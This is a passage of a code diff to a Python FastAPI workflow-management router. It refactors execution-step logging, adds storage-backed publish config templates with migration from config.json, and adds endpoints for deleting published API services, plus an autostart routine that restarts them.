+                "source": workflow_data.get("source"),
+            }
+        ),
+        "updatedAt": int(time.time() * 1000),
+        "publish": _publish_for_config(service),
+        "triggers": [_trigger_for_config(workflow_id, trigger) for trigger in triggers],
+    }
+
+
+async def _build_workflow_integration_runtime(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+) -> Dict[str, Any]:
+    """Report the publish state plus each trigger's runtime status (status lookup is best-effort)."""
+    triggers = await _get_workflow_trigger_defs(workflow_id, workflow_data)
+    service = await Storage.read(_api_service_key(workflow_id))
+
+    statuses: Dict[str, Dict[str, Any]] = {}
+    try:
+        runtime_json = set_workflow_json_triggers(workflow_data.get("workflowJson") or {}, triggers)
+        reported = await default_trigger_runtime.get_workflow_trigger_statuses(workflow_id, runtime_json)
+        # Index by trigger id; entries without an id cannot be matched and are skipped.
+        statuses = {entry.get("triggerId"): entry for entry in reported if entry.get("triggerId")}
+    except Exception as exc:
+        log.warning("workflow.config.runtime_status_failed", {
+            "id": workflow_id,
+            "error": str(exc),
+        })
+
+    publish_state = _publish_for_config(service)
+    trigger_rows = [
+        {
+            "trigger": _trigger_to_api_dict(trigger_def),
+            "status": statuses.get(trigger_def.id),
+        }
+        for trigger_def in triggers
+    ]
+    return {
+        "publish": publish_state,
+        "triggers": trigger_rows,
+    }
+
+
+async def _write_workflow_integration_config(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    *,
+    triggers: Optional[List[TriggerDefinition]] = None,
+    service: Optional[Dict[str, Any]] = None,
+) -> tuple[Path, Dict[str, Any]]:
+    """Build the integration config, write it to ``config.json`` and return ``(path, config)``."""
+    target_dir = _workflow_config_dir(workflow_id, workflow_data)
+    target_dir.mkdir(parents=True, exist_ok=True)
+
+    config = await _build_workflow_integration_config(
+        workflow_id,
+        workflow_data,
+        triggers=triggers,
+        service=service,
+    )
+    serialized = json.dumps(config, ensure_ascii=False, indent=2)
+    config_path = target_dir / "config.json"
+    config_path.write_text(serialized, encoding="utf-8")
+    return config_path, config
+
+
+async def _read_stored_workflow_integration_config(workflow_id: str) -> Optional[Dict[str, Any]]:
+    stored = await Storage.read(_workflow_integration_config_key(workflow_id))  # template saved in Storage
+    return stored if isinstance(stored, dict) else None  # anything but a dict counts as "no template"
+
+
+async def _read_file_workflow_integration_config(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    config_path: Path,
+) -> Optional[Dict[str, Any]]:
+    if not config_path.is_file():
+        return None  # No config file at this path.
+    raw_config = json.loads(config_path.read_text(encoding="utf-8"))  # NOTE(review): malformed JSON raises here uncaught
+    if not isinstance(raw_config, dict):
+        raise HTTPException(status_code=422, detail="workflow config file must contain a JSON object")
+    return _normalize_workflow_integration_config_template(workflow_id, workflow_data, raw_config)  # sanitized + validated
+
+
+async def _load_workflow_integration_config_template(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    config_path: Path,
+) -> tuple[Optional[Dict[str, Any]], str]:
+    """Resolve the publish template from Storage, else migrate it from config.json; returns (config, origin)."""
+    stored = await _read_stored_workflow_integration_config(workflow_id)
+    if stored is not None:
+        return stored, "storage"
+
+    file_config = await _read_file_workflow_integration_config(workflow_id, workflow_data, config_path)
+    if file_config is None:
+        return None, "missing"
+    # Migration: persist the file-based template so later loads are served from Storage.
+    storage_key = _workflow_integration_config_key(workflow_id)
+    await Storage.write(storage_key, file_config)
+    log.info(
+        "workflow.config.migrated_from_file",
+        {"id": workflow_id, "path": str(config_path), "storage_key": storage_key},
+    )
+    return file_config, "file_migrated"
+
+
 def _replace_or_append_trigger(
     triggers: List[TriggerDefinition],
     trigger: TriggerDefinition,
@@ -563,7 +1001,13 @@ async def _persist_workflow_triggers(
     data["workflowJson"] = updated_json
     data["updatedAt"] = int(time.time() * 1000)
     is_global = data.get("source") == "global"
-    _write_workflow_to_fs(workflow_id, updated_json, data, data.get("markdownContent"), global_store=is_global)
+    _write_workflow_to_fs(
+        workflow_id,
+        updated_json,
+        data,
+        data.get("markdownContent"),
+        global_store=is_global,
+    )
     return data
 
 
@@ -579,27 +1023,27 @@ async def _run_workflow_execution_task(
     """Execute a workflow in the background and keep the execution record updated."""
     exec_key = _workflow_execution_key(exec_id)
     start_time = time.time()
-    step_history: list[dict[str, Any]] = []
+    step_count = 0
     loop = asyncio.get_running_loop()
+    pending_step_index: Optional[int] = None
+    pending_step: Optional[Dict[str, Any]] = None
+    execution_summary: Dict[str, Any] = {
+        "id": exec_id,
+        "workflowId": workflow_id,
+        "inputParams": compact_outputs_for_storage(req.inputs or {}),
+        "status": "running",
+        "startedAt": int(start_time * 1000),
+        "executionLog": [],
+        "currentPhase": "queued",
+        "currentStepIndex": 0,
+        "stepCount": 0,
+    }
 
     def _write_progress(update_fields: Dict[str, Any]) -> None:
-        # Called from the workflow-engine worker thread on every step
-        # start/complete.  Step events for a single execution are issued
-        # serially by the engine, so no extra lock is needed beyond the
-        # caller's invariant — but we must still tolerate transient
-        # ``Storage.read`` failures (e.g. SQLite contention) without
-        # corrupting ``current`` with a non-dict result.
         try:
-            current = asyncio.run_coroutine_threadsafe(
-                Storage.read(exec_key), loop
-            ).result(timeout=5)
-            if not isinstance(current, dict):
-                # Execution record was trimmed mid-run or never persisted;
-                # rebuild a minimal payload so the write still goes through.
-                current = {"id": exec_id, "workflowId": workflow_id}
-            current.update(update_fields)
+            execution_summary.update(update_fields)
             asyncio.run_coroutine_threadsafe(
-                Storage.write(exec_key, current), loop
+                Storage.write(exec_key, compact_execution_summary(execution_summary)), loop
             ).result(timeout=5)
         except Exception as exc:
             log.warning("workflow.step_progress.write_failed", {
@@ -608,29 +1052,87 @@ def _write_progress(update_fields: Dict[str, Any]) -> None:
             })
 
     def _on_step_start(_run_id, step_index, node, _inputs):
-        _write_progress({
-            "currentNodeId": getattr(node, "id", None),
-            "currentNodeType": getattr(node, "type", None),
+        nonlocal pending_step_index, pending_step
+        node_id = getattr(node, "id", None)
+        node_type = getattr(node, "type", None)
+        loop_progress = derive_loop_progress(
+            node_id=node_id,
+            global_step_index=step_index,
+            inputs=_inputs,
+            outputs=None,
+        )
+        pending_step_index = step_index
+        pending_step = {
+            "node_id": node_id,
+            "node_type": node_type,
+            "inputs": _inputs if isinstance(_inputs, dict) else {},
+            "outputs": {},
+            "error": "Run cancelled before node completed",
+        }
+        execution_summary.update({
+            "currentNodeId": node_id,
+            "currentNodeType": node_type,
             "currentPhase": "running",
             "currentStepIndex": step_index,
+            "loopProgress": loop_progress,
+            "updatedAt": int(time.time() * 1000),
         })
         return step_index
 
     def _on_step_complete(step_result) -> None:
-        # Compact each step's outputs *before* appending so the running
-        # ``step_history`` (and every subsequent ``_write_progress`` snapshot
-        # that ships it to SQLite) stays bounded, even when a workflow node
-        # returns tens of thousands of alerts that are already persisted to
-        # JSONL on disk.
+        nonlocal step_count, pending_step_index, pending_step
         step_dict = compact_step_for_storage(step_result.model_dump(mode="json"))
-        step_history.append(step_dict)
-        _write_progress({
-            "executionLog": list(step_history),
+        step_count += 1
+        pending_step_index = None
+        pending_step = None
+        loop_progress = derive_loop_progress(
+            node_id=step_dict.get("node_id"),
+            global_step_index=step_count,
+            inputs=step_dict.get("inputs"),
+            outputs=step_dict.get("outputs"),
+        )
+        execution_summary.update({
+            "stepCount": step_count,
             "currentNodeId": step_dict.get("node_id"),
             "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
             "currentPhase": "running",
-            "currentStepIndex": len(step_history),
+            "currentStepIndex": step_count,
+            "loopProgress": loop_progress,
+            "updatedAt": int(time.time() * 1000),
         })
+        try:
+            asyncio.run_coroutine_threadsafe(
+                record_execution_step(exec_id, step_count, step_dict),
+                loop,
+            ).result(timeout=5)
+        except Exception as exc:
+            log.warning("workflow.execution_step.write_failed", {
+                "exec_id": exec_id,
+                "step_index": step_count,
+                "error": str(exc),
+            })
+        if step_count % _PROGRESS_FLUSH_EVERY_STEPS == 0:
+            _write_progress({
+                "stepCount": step_count,
+                "currentNodeId": step_dict.get("node_id"),
+                "currentNodeType": step_dict.get("node_type") or step_dict.get("type"),
+                "currentPhase": "running",
+                "currentStepIndex": step_count,
+                "loopProgress": loop_progress,
+                "updatedAt": int(time.time() * 1000),
+            })
+
+    async def _flush_pending_step() -> None:
+        if pending_step_index is None or pending_step is None:
+            return
+        try:
+            await record_execution_step(exec_id, pending_step_index, pending_step)
+        except Exception as exc:
+            log.warning("workflow.pending_step.write_failed", {
+                "exec_id": exec_id,
+                "step_index": pending_step_index,
+                "error": str(exc),
+            })
 
     try:
         result: RunWorkflowResult = await asyncio.to_thread(
@@ -646,32 +1148,32 @@ def _on_step_complete(step_result) -> None:
         )
 
         duration = time.time() - start_time
-        current_data = await Storage.read(exec_key)
-        if not isinstance(current_data, dict):
-            # Defensive: the execution record could be missing if it was
-            # trimmed/cleaned up mid-run.  Rebuild a baseline so the final
-            # status write still succeeds rather than blowing up.
-            current_data = {"id": exec_id, "workflowId": workflow_id}
+        current_data = dict(execution_summary)
         status_value, error_message = _resolve_execution_outcome(result)
         if cancel_event.is_set() and status_value == "success":
             status_value = "cancelled"
             error_message = error_message or f"Run cancelled: run_id={result.run_id or exec_id}"
-        # ``result.history`` is the engine-side authoritative history (not
-        # yet compacted), while ``step_history`` was already compacted in
-        # ``_on_step_complete``.  Prefer the former when available, then
-        # run it through ``compact_history_for_storage`` so the persisted
-        # row stays small in either branch.
+        # ``record_execution_result`` backfills this compacted history into
+        # append-only step rows, then stores only the summary row.
+        final_history = compact_history_for_storage(result.history)
+        if status_value == "cancelled" and not final_history:
+            await _flush_pending_step()
+        final_steps = result.steps
+        if pending_step_index is not None:
+            final_steps = max(final_steps, pending_step_index)
         current_data.update({
             "outputResults": compact_outputs_for_storage(result.outputs),
             "status": status_value,
             "finishedAt": int(time.time() * 1000),
             "duration": duration,
-            "executionLog": compact_history_for_storage(result.history) or list(step_history),
+            "executionLog": final_history,
+            "stepCount": final_steps,
             "errorMessage": error_message,
             "currentNodeId": result.last_node_id,
             "currentNodeType": current_data.get("currentNodeType"),
             "currentPhase": status_value,
-            "currentStepIndex": result.steps,
+            "currentStepIndex": final_steps,
+            "updatedAt": int(time.time() * 1000),
         })
 
         await _record_execution_result(workflow_id, exec_id, current_data)
@@ -683,16 +1185,16 @@ def _on_step_complete(step_result) -> None:
         })
     except Exception as exc:
         duration = time.time() - start_time
-        current_data = await Storage.read(exec_key)
-        if not isinstance(current_data, dict):
-            current_data = {"id": exec_id, "workflowId": workflow_id}
+        current_data = dict(execution_summary)
         current_data.update({
             "status": "cancelled" if cancel_event.is_set() else "error",
             "finishedAt": int(time.time() * 1000),
             "duration": duration,
             "errorMessage": str(exc),
-            "executionLog": list(step_history),
+            "executionLog": [],
+            "stepCount": step_count,
             "currentPhase": "cancelled" if cancel_event.is_set() else "error",
+            "updatedAt": int(time.time() * 1000),
         })
         await _record_execution_result(workflow_id, exec_id, current_data)
         log.error("workflow.execute.error", {
@@ -804,6 +1306,7 @@ async def create_workflow(req: WorkflowCreateRequest):
         meta = {
             "id": workflow_id,
             "name": req.name,
+            "nameI18n": req.name_i18n,
             "description": req.description,
             "category": req.category or "default",
             "status": "draft",
@@ -819,6 +1322,7 @@ async def create_workflow(req: WorkflowCreateRequest):
             **meta,
             "workflowJson": req.workflow_json,
             "markdownContent": None,
+            "editMarkdownContent": None,
             "stats": stats,
             "source": source,
         }
@@ -876,6 +1380,8 @@ async def update_workflow(workflow_id: str, req: WorkflowUpdateRequest):
 
         if req.name is not None:
             data["name"] = req.name
+        if req.name_i18n is not None:
+            data["nameI18n"] = req.name_i18n
         if req.description is not None:
             data["description"] = req.description
         if req.category is not None:
@@ -888,14 +1394,25 @@ async def update_workflow(workflow_id: str, req: WorkflowUpdateRequest):
                 workflow_json = req.workflow_json
             except Exception as e:
                 raise HTTPException(status_code=400, detail=f"Invalid workflow JSON: {str(e)}")
-
+        if req.markdown_content is not None:
+            markdown_content = req.markdown_content
+        elif req.edit_markdown_content is not None:
+            markdown_content = req.edit_markdown_content
         data["updatedAt"] = int(time.time() * 1000)
 
         is_global = data.get("source") == "global"
-        _write_workflow_to_fs(workflow_id, workflow_json, data, markdown_content, global_store=is_global)
+        _write_workflow_to_fs(
+            workflow_id,
+            workflow_json,
+            data,
+            markdown_content,
+            global_store=is_global,
+        )
 
         stats = await _get_workflow_stats(workflow_id)
         data["workflowJson"] = workflow_json
+        data["markdownContent"] = markdown_content
+        data["editMarkdownContent"] = markdown_content
         data["stats"] = stats
 
         log.info("workflow.updated", {"id": workflow_id})
@@ -921,52 +1438,20 @@ async def delete_workflow(workflow_id: str):
         if not data:
             raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
 
+        # Stop runtime resources before removing the filesystem source of truth.
+        await _stop_workflow_runtime_resources(workflow_id)
+
         # Remove from filesystem (source of truth)
         _delete_workflow_from_fs(workflow_id)
 
         from flocks.hub import local as hub_local
 
-        hub_local.remove_installed_record("workflow", workflow_id)
-
-        # Clean up runtime data from Storage
         try:
-            await Storage.remove(_workflow_stats_key(workflow_id))
-        except Storage.NotFoundError:
-            pass
-
-        try:
-            exec_keys = await Storage.list("workflow_execution/")
-            for key in exec_keys:
-                try:
-                    exec_data = await Storage.read(key)
-                    if exec_data.get("workflowId") == workflow_id:
-                        await Storage.remove(key)
-                except Exception:
-                    pass
-        except Exception:
-            pass
-
-        try:
-            from flocks.ingest.syslog.manager import default_manager as _syslog_default_manager
-
-            await _syslog_default_manager.stop_workflow(workflow_id)
-        except Exception:
-            pass
-        try:
-            await Storage.remove(_syslog_config_key(workflow_id))
-        except Storage.NotFoundError:
-            pass
-
-        try:
-            from flocks.ingest.kafka.manager import default_manager as _kafka_default_manager
+            hub_local.remove_installed_record("workflow", workflow_id)
+        except Exception as exc:
+            log.warning("workflow.delete.hub_record_remove_failed", {"id": workflow_id, "error": str(exc)})
 
-            await _kafka_default_manager.stop_workflow(workflow_id)
-        except Exception:
-            pass
-        try:
-            await Storage.remove(_kafka_config_key(workflow_id))
-        except Storage.NotFoundError:
-            pass
+        await _cleanup_workflow_storage(workflow_id)
 
         log.info("workflow.deleted", {"id": workflow_id})
         await publish_event("workflow.deleted", {"id": workflow_id})
@@ -1310,11 +1795,18 @@ async def get_workflow_history(
         if not data:
             raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
 
-        # 单次查询批量读取所有 execution 记录，避免 N 次单独 read 导致超长耗时
-        all_entries = await Storage.list_entries("workflow_execution/")
+        # Keep the list endpoint on summary rows only.  Do not materialize
+        # append-only step logs here; the execution-details endpoint loads them.
+        all_entries = await Storage.list_raw("workflow_execution/")
         executions = []
-        for _key, exec_data in all_entries:
+        workflow_marker = f'"workflowId": "{workflow_id}"'
+        compact_marker = f'"workflowId":"{workflow_id}"'
+        for _key, raw_value in all_entries:
             try:
+                head = raw_value[:500]
+                if workflow_marker not in head and compact_marker not in head:
+                    continue
+                exec_data = json.loads(raw_value)
                 if not isinstance(exec_data, dict):
                     continue
                 if exec_data.get("workflowId") != workflow_id:
@@ -1323,6 +1815,7 @@ async def get_workflow_history(
                     continue
                 if trigger_type and exec_data.get("triggerType") != trigger_type:
                     continue
+                exec_data["executionLog"] = []
                 executions.append(WorkflowExecutionResponse(**exec_data))
             except Exception as e:
                 log.warning("workflow.history.skip", {"key": _key, "error": str(e)})
@@ -1342,7 +1835,12 @@ async def get_workflow_history(
 
 
 @router.get("/workflow/{workflow_id}/history/{exec_id}", response_model=WorkflowExecutionResponse)
-async def get_execution_details(workflow_id: str, exec_id: str):
+async def get_execution_details(
+    workflow_id: str,
+    exec_id: str,
+    step_offset: int = Query(0, ge=0, alias="stepOffset"),
+    step_limit: int = Query(500, ge=0, le=1000, alias="stepLimit"),
+):
     """
     Get execution details
     
@@ -1355,6 +1853,26 @@ async def get_execution_details(workflow_id: str, exec_id: str):
         if exec_data.get("workflowId") != workflow_id:
             raise HTTPException(status_code=404, detail="Execution not found for this workflow")
         
+        if step_limit == 0:
+            inline_log = exec_data.get("executionLog")
+            inline_count = len(inline_log) if isinstance(inline_log, list) else 0
+            steps, total_steps = [], exec_data.get("stepCount") or inline_count
+        else:
+            steps, total_steps = await load_execution_steps(
+                exec_id,
+                offset=step_offset,
+                limit=step_limit,
+            )
+            if total_steps == 0:
+                legacy_steps = compact_history_for_storage(exec_data.get("executionLog"))
+                total_steps = len(legacy_steps)
+                steps = legacy_steps[step_offset:step_offset + step_limit]
+        exec_data = dict(exec_data)
+        exec_data["executionLog"] = steps
+        exec_data["stepLogOffset"] = step_offset
+        exec_data["stepLogLimit"] = step_limit
+        exec_data["stepLogTotal"] = total_steps
+        exec_data["stepCount"] = exec_data.get("stepCount") or total_steps
         return WorkflowExecutionResponse(**exec_data)
     except Storage.NotFoundError:
         raise HTTPException(status_code=404, detail=f"Execution not found: {exec_id}")
@@ -1492,6 +2010,7 @@ async def import_workflow(workflow_json: Dict[str, Any]):
             **meta,
             "workflowJson": workflow_json,
             "markdownContent": None,
+            "editMarkdownContent": None,
             "stats": stats,
             "source": "global",
         }
@@ -1542,16 +2061,170 @@ async def export_workflow(workflow_id: str):
 _API_SERVICE_PREFIX = "workflow_api_service/"
 _KAFKA_CONFIG_PREFIX = WORKFLOW_KAFKA_CONFIG_PREFIX
 _REGISTRY_PREFIX_MAIN = "workflow_registry/"
+_RUNTIME_PREFIX_MAIN = "workflow_runtime/"
 
 
 def _api_service_key(workflow_id: str) -> str:
     return f"{_API_SERVICE_PREFIX}{workflow_id}"
 
 
+def _runtime_key_main(workflow_id: str) -> str:
+    return f"{_RUNTIME_PREFIX_MAIN}{workflow_id}"
+
+
+def _workflow_id_from_api_service_key(key: Any) -> str:
+    return str(key).removeprefix(_API_SERVICE_PREFIX)
+
+
 def _kafka_config_key(workflow_id: str) -> str:
     return f"{_KAFKA_CONFIG_PREFIX}{workflow_id}"
 
 
+async def _prepare_workflow_api_registry(workflow_id: str) -> tuple[Dict[str, Any], int]:
+    """Write the workflow JSON snapshot to disk and upsert its workflow center registry entry."""
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise WorkflowNotFoundError(f"Workflow not found: {workflow_id}")
+
+    workflow_json = data["workflowJson"]
+    service_dir = Config.get_data_path() / "workflow-services" / "workflows" / workflow_id
+    service_dir.mkdir(parents=True, exist_ok=True)
+    workflow_path = service_dir / "workflow.json"
+    workflow_path.write_text(json.dumps(workflow_json), encoding="utf-8")
+
+    fp = hashlib.sha256(workflow_path.read_bytes()).hexdigest()
+    now_ms = int(time.time() * 1000)
+
+    existing_registry = await Storage.read(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}") or {}
+    registry_entry = {
+        "workflowId": workflow_id,
+        "name": data["name"],
+        "sourceType": "main_storage",
+        "workflowPath": str(workflow_path),
+        "fingerprint": fp,
+        "publishStatus": "unpublished",
+        "registeredAt": existing_registry.get("registeredAt", now_ms),
+        "updatedAt": now_ms,
+    }
+    await Storage.write(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}", registry_entry)
+    return data, now_ms
+
+
+def _workflow_api_autostart_enabled() -> bool:
+    raw = os.getenv("FLOCKS_WORKFLOW_API_AUTOSTART", "1").strip().lower()
+    return raw not in {"0", "false", "no", "off"}
+
+
+def _service_driver_from_record(service: Dict[str, Any]) -> Optional[Literal["local", "docker"]]:
+    driver = str(service.get("driver") or "").strip().lower()
+    if driver in {"local", "docker"}:
+        return driver  # type: ignore[return-value]
+    return None
+
+
+def _is_manually_stopped_service(service: Dict[str, Any]) -> bool:
+    return str(service.get("status") or "").strip().lower() == "stopped" and bool(service.get("stoppedAt"))
+
+
+async def _normalize_listed_api_service(key: Any, entry: Any) -> Optional[Dict[str, Any]]:
+    if not isinstance(entry, dict):
+        return None
+
+    service = dict(entry)
+    workflow_id = str(service.get("workflowId") or _workflow_id_from_api_service_key(key))
+    service["workflowId"] = workflow_id
+    runtime = await Storage.read(_runtime_key_main(workflow_id))
+
+    if isinstance(runtime, dict) and runtime:
+        service_url = runtime.get("serviceUrl") or service.get("serviceUrl") or ""
+        service["serviceUrl"] = service_url
+        service["invokeUrl"] = f"{service_url}/invoke" if service_url else service.get("invokeUrl", "")
+        service["status"] = "running" if runtime.get("status") in {"active", "running"} else service.get("status", "running")
+        service["driver"] = runtime.get("driver") or service.get("driver")
+        service["containerName"] = runtime.get("containerName") or service.get("containerName", "")
+        service["image"] = runtime.get("image") or service.get("image")
+        return service
+
+    status = str(service.get("status") or "").strip().lower()
+    if status in {"running", "publishing"}:
+        service["status"] = "stopped"
+        service["health"] = {
+            **(service.get("health") if isinstance(service.get("health"), dict) else {}),
+            "ok": False,
+            "stale": True,
+            "reason": "missing_runtime",
+        }
+    return service
+
+
+async def reconcile_published_workflow_api_services() -> Dict[str, int]:
+    """Restart persisted workflow API services after the main server restarts."""
+    stats = {"checked": 0, "healthy": 0, "restarted": 0, "failed": 0, "skipped": 0}
+    if not _workflow_api_autostart_enabled():
+        return stats
+
+    keys = await Storage.list_keys(_API_SERVICE_PREFIX)
+    for key in keys:
+        service = await Storage.read(key)
+        if not isinstance(service, dict):
+            continue
+
+        workflow_id = str(service.get("workflowId") or _workflow_id_from_api_service_key(key))
+        if _is_manually_stopped_service(service):
+            stats["skipped"] += 1
+            continue
+
+        stats["checked"] += 1
+        try:
+            health = await get_workflow_health(workflow_id)
+        except Exception as exc:
+            health = {"ok": False, "error": str(exc)}
+
+        if health.get("ok"):
+            service["status"] = "running"
+            service["health"] = health
+            await Storage.write(_api_service_key(workflow_id), service)
+            stats["healthy"] += 1
+            continue
+
+        now_ms = int(time.time() * 1000)
+        service["lastStartAttemptAt"] = now_ms
+        try:
+            data, _ = await _prepare_workflow_api_registry(workflow_id)
+            active_record = await publish_workflow(
+                workflow_id,
+                image=service.get("image") or None,
+                driver=_service_driver_from_record(service),
+                api_key=service.get("apiKey") or None,
+            )
+
+            service_url = active_record.get("serviceUrl", "")
+            service.update({
+                "workflowId": workflow_id,
+                "workflowName": service.get("workflowName") or data["name"],
+                "serviceUrl": service_url,
+                "invokeUrl": f"{service_url}/invoke",
+                "apiKey": service.get("apiKey") or active_record.get("apiKey"),
+                "status": "running",
+                "containerName": active_record.get("containerName", ""),
+                "driver": active_record.get("driver") or service.get("driver"),
+                "image": active_record.get("image") or service.get("image"),
+                "restartedAt": int(time.time() * 1000),
+            })
+            service.pop("lastStartError", None)
+            service["health"] = {"ok": True, "restarted": True}
+            await Storage.write(_api_service_key(workflow_id), service)
+            stats["restarted"] += 1
+        except Exception as exc:
+            service["status"] = "error"
+            service["health"] = health
+            service["lastStartError"] = str(exc)
+            await Storage.write(_api_service_key(workflow_id), service)
+            log.warning("workflow.api.autostart_failed", {"id": workflow_id, "error": str(exc)})
+            stats["failed"] += 1
+    return stats
+
+
 class WorkflowServiceResponse(BaseModel):
     workflowId: str
     workflowName: str
@@ -1562,6 +2235,7 @@ class WorkflowServiceResponse(BaseModel):
     publishedAt: int
     containerName: Optional[str] = None
     driver: Optional[Literal["local", "docker"]] = None
+    image: Optional[str] = None
 
 
 class KafkaConfigRequest(BaseModel):
@@ -1625,6 +2299,7 @@ class WorkflowPollerConfigRequest(BaseModel):
 
     enabled: bool = False
     intervalSeconds: int = Field(30, ge=1)
+    cronExpression: Optional[str] = None
     timeoutSeconds: int = Field(7200, ge=1)
     noOverlap: bool = True
     inputs: Dict[str, Any] = Field(default_factory=dict)
@@ -1655,49 +2330,27 @@ async def publish_workflow_as_api(
     starts the selected runtime, and returns the service URL and generated API key.
     """
     try:
-        data = _read_workflow_from_fs(workflow_id)
-        if not data:
-            raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
-
-        workflow_json = data["workflowJson"]
-
-        # Write workflow JSON to a stable path that center.py can read
-        service_dir = Config.get_data_path() / "workflow-services" / "workflows" / workflow_id
-        service_dir.mkdir(parents=True, exist_ok=True)
-        workflow_path = service_dir / "workflow.json"
-        workflow_path.write_text(json.dumps(workflow_json), encoding="utf-8")
+        data, now_ms = await _prepare_workflow_api_registry(workflow_id)
 
-        fp = hashlib.sha256(workflow_path.read_bytes()).hexdigest()
-        now_ms = int(time.time() * 1000)
-
-        existing_registry = await Storage.read(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}") or {}
-        registry_entry = {
-            "workflowId": workflow_id,
-            "name": data["name"],
-            "sourceType": "main_storage",
-            "workflowPath": str(workflow_path),
-            "fingerprint": fp,
-            "publishStatus": "unpublished",
-            "registeredAt": existing_registry.get("registeredAt", now_ms),
-            "updatedAt": now_ms,
-        }
-        await Storage.write(f"{_REGISTRY_PREFIX_MAIN}{workflow_id}", registry_entry)
+        # Preserve existing API key across re-publishes so callers don't break.
+        # The runtime must receive the same key before it starts so /invoke can
+        # enforce the key returned to callers.
+        existing_service = await Storage.read(_api_service_key(workflow_id)) or {}
+        api_key = existing_service.get("apiKey") or (uuid.uuid4().hex + uuid.uuid4().hex)
 
         # Use center.py to publish the selected runtime.
         active_record = await publish_workflow(
             workflow_id,
             image=req.image if req else None,
             driver=req.driver if req else None,
+            api_key=api_key,
         )
 
-        # Preserve existing API key across re-publishes so callers don't break
-        existing_service = await Storage.read(_api_service_key(workflow_id)) or {}
-        api_key = existing_service.get("apiKey") or (uuid.uuid4().hex + uuid.uuid4().hex)
-
         service_url = active_record.get("serviceUrl", "")
         invoke_url = f"{service_url}/invoke"
         container_name = active_record.get("containerName", "")
         driver = active_record.get("driver") or (req.driver if req else None)
+        image = active_record.get("image") or (req.image if req else None)
 
         service_info = {
             "workflowId": workflow_id,
@@ -1709,11 +2362,14 @@ async def publish_workflow_as_api(
             "publishedAt": now_ms,
             "containerName": container_name,
             "driver": driver,
+            "image": image,
         }
         await Storage.write(_api_service_key(workflow_id), service_info)
 
         log.info("workflow.api.published", {"id": workflow_id, "url": service_url})
         return service_info
+    except WorkflowNotFoundError as e:
+        raise HTTPException(status_code=404, detail=str(e))
     except HTTPException:
         raise
     except WorkflowCenterError as e:
@@ -1759,22 +2415,150 @@ async def get_workflow_service(workflow_id: str):
     Returns null if not published.
     """
     try:
-        service = await Storage.read(_api_service_key(workflow_id))
-        if isinstance(service, dict) and service.get("status") == "running":
-            try:
-                health = await get_workflow_health(workflow_id)
-            except Exception:
-                health = {}
-            if health and not health.get("ok"):
-                service["status"] = "error" if health.get("published") else "stopped"
-                service["health"] = health
-                await Storage.write(_api_service_key(workflow_id), service)
-        return service  # None / null if not found
+        return await Storage.read(_api_service_key(workflow_id))  # None / null if not found
     except Exception as e:
         log.error("workflow.service.get.error", {"id": workflow_id, "error": str(e)})
         raise HTTPException(status_code=500, detail=f"Failed to get service info: {str(e)}")
 
 
+@router.delete("/workflow/{workflow_id}/service")
+async def delete_workflow_service(workflow_id: str):
+    """Stop the workflow's API service, then delete its stored service configuration."""
+    try:
+        existing = await Storage.read(_api_service_key(workflow_id))
+        if not existing:
+            raise HTTPException(status_code=404, detail="No published service found for this workflow")
+
+        try:
+            await stop_workflow_service(workflow_id)
+        except (WorkflowNotFoundError, WorkflowNotPublishedError):
+            pass
+
+        try:
+            await Storage.remove(_api_service_key(workflow_id))
+        except Storage.NotFoundError:
+            pass
+
+        log.info("workflow.api.service_deleted", {"id": workflow_id})
+        return {"ok": True, "workflowId": workflow_id}
+    except HTTPException:
+        raise
+    except Exception as e:
+        log.error("workflow.service.delete.error", {"id": workflow_id, "error": str(e)})
+        raise HTTPException(status_code=500, detail=f"Failed to delete workflow service: {str(e)}")
+
+
+@router.get("/workflow/{workflow_id}/config")
+async def get_workflow_config(workflow_id: str):
+    """Read workflow publish template from Storage, migrating config.json if needed."""
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
+
+    config_path = _workflow_config_dir(workflow_id, data) / "config.json"
+    runtime = await _build_workflow_integration_runtime(workflow_id, data)
+    try:
+        config, source = await _load_workflow_integration_config_template(workflow_id, data, config_path)
+        if config is not None:
+            return {
+                "exists": True,
+                "path": str(config_path),
+                "storageKey": _workflow_integration_config_key(workflow_id),
+                "source": source,
+                "config": config,
+                "runtime": runtime,
+            }
+
+        config = await _build_workflow_integration_config(workflow_id, data)
+        return {
+            "exists": False,
+            "path": str(config_path),
+            "storageKey": _workflow_integration_config_key(workflow_id),
+            "source": "generated",
+            "config": config,
+            "runtime": runtime,
+        }
+    except HTTPException:
+        raise
+    except Exception as exc:
+        log.error("workflow.config.get.error", {"id": workflow_id, "error": str(exc)})
+        raise HTTPException(status_code=500, detail=f"Failed to read workflow config: {str(exc)}")
+
+
+@router.put("/workflow/{workflow_id}/config")
+async def update_workflow_config(
+    workflow_id: str,
+    config: Dict[str, Any] = Body(...),
+):
+    """Update the publish template in Storage without mutating runtime state."""
+    data = _read_workflow_from_fs(workflow_id)
+    if not data:
+        raise HTTPException(status_code=404, detail=f"Workflow not found: {workflow_id}")
+
+    try:
+        normalized_config = _normalize_workflow_integration_config_template(workflow_id, data, config)
+        config_path = _workflow_config_dir(workflow_id, data) / "config.json"
+        await Storage.write(_workflow_integration_config_key(workflow_id), normalized_config)
+        log.info("workflow.config.updated", {
+            "id": workflow_id,
+            "storage_key": _workflow_integration_config_key(workflow_id),
+        })
+        return {
+            "ok": True,
+            "exists": True,
+            "path": str(config_path),
+            "storageKey": _workflow_integration_config_key(workflow_id),
+            "source": "storage",
+            "config": normalized_config,
+            "runtime": await _build_workflow_integration_runtime(workflow_id, data),
+        }
+    except HTTPException:
+        raise
+    except Exception as exc:
+        log.error("workflow.config.update.error", {"id": workflow_id, "error": str(exc)})
+        raise HTTPException(status_code=500, detail=f"Failed to update workflow config: {str(exc)}")
+
+
+@router.post("/workflow/{workflow_id}/config/sync")
+async def sync_workflow_config(workflow_id: str):
